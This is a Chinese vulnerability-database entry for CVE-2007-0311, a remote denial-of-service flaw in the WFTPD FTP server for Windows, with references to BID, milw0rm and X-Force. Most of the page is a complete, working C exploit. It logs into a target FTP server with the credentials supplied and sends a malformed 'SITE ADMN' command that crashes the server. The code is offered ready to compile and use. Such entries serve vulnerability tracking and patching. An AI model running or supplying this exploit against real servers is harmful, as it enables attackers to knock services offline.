WFTPD服务器SITE ADMIN命令远程拒绝服务漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1112003 漏洞类型 其他
发布时间 2007-01-14 更新时间 2007-01-18
CVE编号 CVE-2007-0311 CNNVD-ID CNNVD-200701-264
漏洞平台 Windows CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/3126
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200701-264
|漏洞详情
WFTPD是Windows平台下的FTP服务程序。WFTPD在处理带有超长畸形参数的SITEADMIN命令时存在漏洞,远程攻击者可以通过发送畸形的命令导致服务器发生崩溃。
|漏洞EXP
/************************************************************************
*WFTPD server <= 3.25 SITE ADMN DoS                                     *
*                                                                       *
*Sending command SITE ADMN + \32 makes server BOOM                      *
*                                                                       *
*usage: wftpd_dos.exe ip port user pass                                 *
*                                                                       *
*Coded by Marsu <Marsupilamipowa@hotmail.fr>                            *
************************************************************************/

#include "winsock2.h"
#include "stdio.h"
#include "stdlib.h"
#pragma comment(lib, "ws2_32.lib")

int main(int argc, char* argv[])
{
	struct hostent *he;
	struct sockaddr_in sock_addr;
	WSADATA wsa;
	int ftpsock;
	char recvbuff[1024];
	char evilbuff[100];
	int buflen=100;

	if (argc!=5)
	{
		printf("[+] Usage: %s <ip> <port> <user> <pass>\n",argv[0]);
		return 1;
	}
	WSACleanup();
	WSAStartup(MAKEWORD(2,0),&wsa);

	printf("[+] Connecting to %s:%s ... ",argv[1],argv[2]);
	if ((he=gethostbyname(argv[1])) == NULL) {
		printf("Failed\n[-] Could not init gethostbyname\n");
		return 1;
	}
	if ((ftpsock = socket(PF_INET, SOCK_STREAM, 0)) == -1) {
		printf("Failed\n[-] Socket error\n");
		return 1;
	}

	sock_addr.sin_family = PF_INET;
	sock_addr.sin_port = htons(atoi(argv[2]));
	sock_addr.sin_addr = *((struct in_addr *)he->h_addr);
	memset(&(sock_addr.sin_zero), '\0', 8);
	if (connect(ftpsock, (struct sockaddr *)&sock_addr, sizeof(struct sockaddr)) == -1) {
		printf("Failed\n[-] Sorry, cannot connect to %s:%s. Error: %i\n", argv[1],argv[2],WSAGetLastError());
		return 1;
	}
	printf("OK\n");
	memset(recvbuff,'\0',1024);
	recv(ftpsock, recvbuff, 1024, 0);

	memset(evilbuff,'\0',buflen);
	memcpy(evilbuff,"USER ",5);
	memcpy(evilbuff+5,argv[3],strlen(argv[3]));
	memcpy(evilbuff+5+strlen(argv[3]),"\r\n\0",3);
	printf("[+] Sending USER ... ");
	if (send(ftpsock,evilbuff,strlen(evilbuff),0)==-1) {
		printf("Failed\n[-] Could not send\n");
		return 1;
	}
	printf("OK\n");
	memset(recvbuff,'\0',1024);
	recv(ftpsock, recvbuff, 1024, 0);

	memset(evilbuff,'\0',buflen);
	memcpy(evilbuff,"PASS ",5);
	memcpy(evilbuff+5,argv[4],strlen(argv[4]));
	memcpy(evilbuff+5+strlen(argv[4]),"\r\n\0",3);

	printf("[+] Sending PASS ... ");
	if (send(ftpsock,evilbuff,strlen(evilbuff),0)==-1) {
		printf("Failed\n[-] Could not send\n");
		return 1;
	}
	printf("OK\n");
	recv(ftpsock, recvbuff, 1024, 0);

	memset(evilbuff,'\0',buflen);
	memcpy(evilbuff,"SITE ADMN ",10);
	memset(evilbuff+10,32,1);			//this char is powerfull :p
	memcpy(evilbuff+10+1,"\r\n\0",3);

	printf("[+] Sending SITE ADMN ... ");
	if (send(ftpsock,evilbuff,strlen(evilbuff),0)==-1) {
		printf("Failed\n[-] Could not send\n");
		return 1;
	}
	printf("OK\n");

	printf("[+] Host should be down\n");
	return 0;
}

// milw0rm.com [2007-01-14]
|参考资料

来源:BID
名称:22046
链接:http://www.securityfocus.com/bid/22046
来源:MILW0RM
名称:3126
链接:http://www.milw0rm.com/exploits/3126
来源:XF
名称:wftpd-admn-dos(31517)
链接:http://xforce.iss.net/xforce/xfdb/31517
来源:MILW0RM
名称:3126
链接:http://milw0rm.com/exploits/3126